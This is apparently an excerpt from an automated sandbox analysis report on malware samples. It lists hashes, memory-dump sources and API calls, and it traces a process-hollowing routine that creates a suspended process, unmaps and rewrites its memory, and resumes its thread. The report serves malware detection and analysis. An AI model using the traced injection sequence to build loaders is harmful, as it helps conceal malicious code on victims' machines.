                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                                • Instruction ID: 7a97e9b117f47accb4cbf8c8560be897060806208c36f25f9f8edba7fd129647
                                                                                • Opcode Fuzzy Hash: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                                • Instruction Fuzzy Hash: C801DFF5B8034147EB30AE10C4C0B7BF2AAAF80B08F18443CC91947600DB72F815DAA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                                • Instruction ID: 20b21e30a0ec0fb2c99107143c2b9476f8de25489f108ff1004ace05f2c41b4d
                                                                                • Opcode Fuzzy Hash: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                                • Instruction Fuzzy Hash: DB0192F9B0071147E620AF25F8C1727A2A89BC1718F58483EE84457342DB7DEC44C6A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                                • Instruction ID: 834250698d5e0500e56c7bb278610784be947653ec03dbaf781bc3f884b91dae
                                                                                • Opcode Fuzzy Hash: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                                • Instruction Fuzzy Hash: 2A1134B01083458BD714CF51C1A066BF7E1FF89788F14995EE4D19B251D7BCD909CB8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction ID: 600bd15b199e3bf62a349a8e59f6aef1bbfc425441a19cab7060a37024eb71d3
                                                                                • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction Fuzzy Hash: 6611F5746493808BE324CF14C8A4B9FFBF1BF86304F044A1CE5858B290D7BA9805CB86
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction ID: 889cefc2f7097b9c6db9ab6823b190a93607d6c31bc0b71ec5331936f27af802
                                                                                • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction Fuzzy Hash: A711F5746093808BE324DF14C8A4B9FFBF1BB86304F044A2DE5959B2D1D7BA9845CF86
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction ID: 2f3728004df68d86a82bdd5c6212a60de738535feb80330ed44325e661de94f3
                                                                                • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction Fuzzy Hash: D91180701883C28BD335CF14D864BEFB7E1BBC6345F48182CD89987682D37984518F46
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
                                                                                • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction ID: 74c9d6d58c9ec79dbfd0dff2334efa0ab04d4f0d2eaee6ca44a31488e629a305
                                                                                • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction Fuzzy Hash: 8FE04FBE9512B08BCB688F25D891572B7B0FB43E54B59501DE446E7250D730EC14CB06
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
                                                                                • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                                • Instruction ID: 2cfabecc1360f204e1c0b0afaa681f2d052b7128f6197a5654aa0f941d3e7788
                                                                                • Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                                • Instruction Fuzzy Hash: 3FE0C2546A898387C70E8E299470337F7E95F0320AF2891B9D9DACB841F735E0408704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$DeleteSelect
                                                                                • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                                                • API String ID: 618127014-763545205
                                                                                • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                                • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                                                • String ID: @$A$C$F
                                                                                • API String ID: 2111159801-319984173
                                                                                • Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                                • Instruction ID: 87ff81332ac758d4626db08b615a9cd7b3b43ae1a524f2b385b8411a688f3b3f
                                                                                • Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                                • Instruction Fuzzy Hash: 1851577050D380CFC750DFA8948875EBFE1AB96224F540E2EF8E587291D3358549CB53
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0210D307
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0210D334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                                • Instruction ID: b5795840258f96bd972c89566b46361be4c95085b2368e3bbee9752a8c2202c1
                                                                                • Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                                • Instruction Fuzzy Hash: E8617BB16483418FD328CF14C8A0BABB7E5EFC6318F054A1DE8D65B381E7B49905CB96
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0210D307
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0210D334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                                • Instruction ID: 69eff6ef2b079232bf54a60dfa0325de216a1a292aab62f1f8e70129ac3df441
                                                                                • Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                                • Instruction Fuzzy Hash: 4F616B716483418FD328CF14C8A0BABB7E1EFC6318F054A1DE8D65B281D7B49905CB96
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0210DC71
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0210DCA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: eI.K$qs
                                                                                • API String ID: 237503144-3936219367
                                                                                • Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                                • Instruction ID: 30ba9916febf62f3f46d9399790d5b62e6550e162382778cbe2daf0d8ecee82f
                                                                                • Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                                • Instruction Fuzzy Hash: 4F5145B0100B049BD7348F26C894BA7BBB5FB45314F544A1CE8A64FB85D7B5F409CB94
                                                                                APIs
                                                                                Strings
                                                                                • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 020F9145
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                                • API String ID: 621844428-2804141084
                                                                                • Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                                • Instruction ID: 2d25f49a32ac4fbde775900db8a979ccd57fd2250b43cc6e0f6bf38dcd71dd65
                                                                                • Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                                • Instruction Fuzzy Hash: 68F01D74CC870A8ECBD4BFB1954D3AE7BE9BF11310F004A3AD69681990DB34804AEE53
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02103AEB
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02103B1C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: V"
                                                                                • API String ID: 237503144-2019076553
                                                                                • Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                                • Instruction ID: 1ac2d8000742cb09facc2153db43a0990fd9fb4d703933def361a1b8ce9a0d79
                                                                                • Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                                • Instruction Fuzzy Hash: 0FE13AB05883828BD335CF14C894BEFBBE1BFC4315F48496DE8A987291D7BA55458F82
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: V"
                                                                                • API String ID: 237503144-2019076553
                                                                                • Opcode ID: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                                                • Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
                                                                                • Opcode Fuzzy Hash: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                                                • Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: /$_
                                                                                • API String ID: 2568140703-3328996620
                                                                                • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                                • Instruction ID: 78a2a0eb960d9b9415e783870e043a577cedb6c1acfa17b4ace27f2dc93d5ee3
                                                                                • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                                • Instruction Fuzzy Hash: E4A1A172A4D7818FD7398A28C8903DFBBD2ABD5324F194A6CD4E9873D1DB358941CB42
                                                                                APIs
                                                                                • SysStringLen.OLEAUT32 ref: 0042B93C
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeapString
                                                                                • String ID: /$_
                                                                                • API String ID: 983180023-3328996620
                                                                                • Opcode ID: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                                                • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                                                • Opcode Fuzzy Hash: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                                                • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: /$_
                                                                                • API String ID: 2568140703-3328996620
                                                                                • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                                • Instruction ID: 7869de5d757b1fa23bf47849b3a24402a776a5459d88906391edd4d88208ab19
                                                                                • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                                • Instruction Fuzzy Hash: 579197726497818FC739CE28C4507DABBE2AFD5314F194A6DD4E9873D1DB369801CB42
                                                                                APIs
                                                                                • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeapString
                                                                                • String ID: /$_
                                                                                • API String ID: 983180023-3328996620
                                                                                • Opcode ID: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                                                • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                                                • Opcode Fuzzy Hash: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                                                • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                                                APIs
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                                • String ID: hi
                                                                                • API String ID: 3432729115-3633523372
                                                                                • Opcode ID: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                                                • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                                                • Opcode Fuzzy Hash: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                                                • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02112530
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02112565
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: hi
                                                                                • API String ID: 237503144-3633523372
                                                                                • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                                • Instruction ID: 1dc39e1a85fe8304d5055989dfd679ae28a88997eece109cd7849961a0186333
                                                                                • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                                • Instruction Fuzzy Hash: AB4136B06483959FE324CF54C894BABBBE6FFC2740F90492CF9995B290D7749405CB92

                                                                                Execution Graph

                                                                                Execution Coverage:50.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:20.5%
                                                                                Total number of Nodes:39
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 391 429b010 392 429b049 391->392 400 429b0e1 392->400 401 4299850 392->401 396 429b115 419 4299fb0 396->419 398 429b1a7 422 429a4f0 NtAllocateVirtualMemory 398->422 402 4299875 401->402 403 4299fb0 VirtualAlloc 402->403 405 429990f 403->405 404 4299921 404->396 413 4299b10 404->413 405->404 406 4299989 NtCreateFile 405->406 407 4299a2b 406->407 412 4299a34 406->412 408 4299a36 CreateFileMappingA 407->408 407->412 409 4299a94 MapViewOfFile 408->409 410 4299a64 408->410 409->412 410->409 410->412 411 4299abc FindCloseChangeNotification 411->404 412->404 412->411 414 4299b5e 413->414 415 4299b77 414->415 416 4299c2d NtProtectVirtualMemory 414->416 415->396 431 429a150 416->431 420 4299ff1 419->420 421 429a024 VirtualAlloc 420->421 421->398 423 429a580 422->423 424 429a6f7 GetTempFileNameA 423->424 433 4299c90 424->433 426 429a71b CreateFileA WriteFile 427 429a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 429a82a 427->428 429 429a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 429a851 WriteProcessMemory 428->430 429->400 430->428 432 4299c5c NtProtectVirtualMemory 431->432 432->415 435 4299c95 433->435 436 429a0d0 437 4299fb0 VirtualAlloc 436->437 438 429a0dd 437->438

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0429A561
                                                                                • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0429A714
                                                                                • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0429A742
                                                                                • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0429A76C
                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0429A7B6
                                                                                • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0429A7D0
                                                                                • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0429A7FB
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0429A81F
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0429A881
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0429A8AF
                                                                                • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0429A8DA
                                                                                • ResumeThread.KERNELBASE(?), ref: 0429A8EC
                                                                                • ExitProcess.KERNEL32(00000000), ref: 0429A8F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Offset: 04299000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_4299000_9EDA.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                                                • String ID: kate
                                                                                • API String ID: 1984375786-4076676908
                                                                                • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                                • Instruction ID: 28f69de8f5fcbdba45fb3d6be4d562361bfdeb995189ba1042e0b8a554d9459f
                                                                                • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                                • Instruction Fuzzy Hash: BFE1D975A10209AFDB54CF84C895FEEB7B5BF88304F108199E908AB391D771AE85CF94

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 04299FB0: VirtualAlloc.KERNELBASE(00000000,0429990F,00003000,00000040), ref: 0429A034
                                                                                • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04299A1B
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04299ACC
                                                                                Strings
                                                                                Memory Dump Source
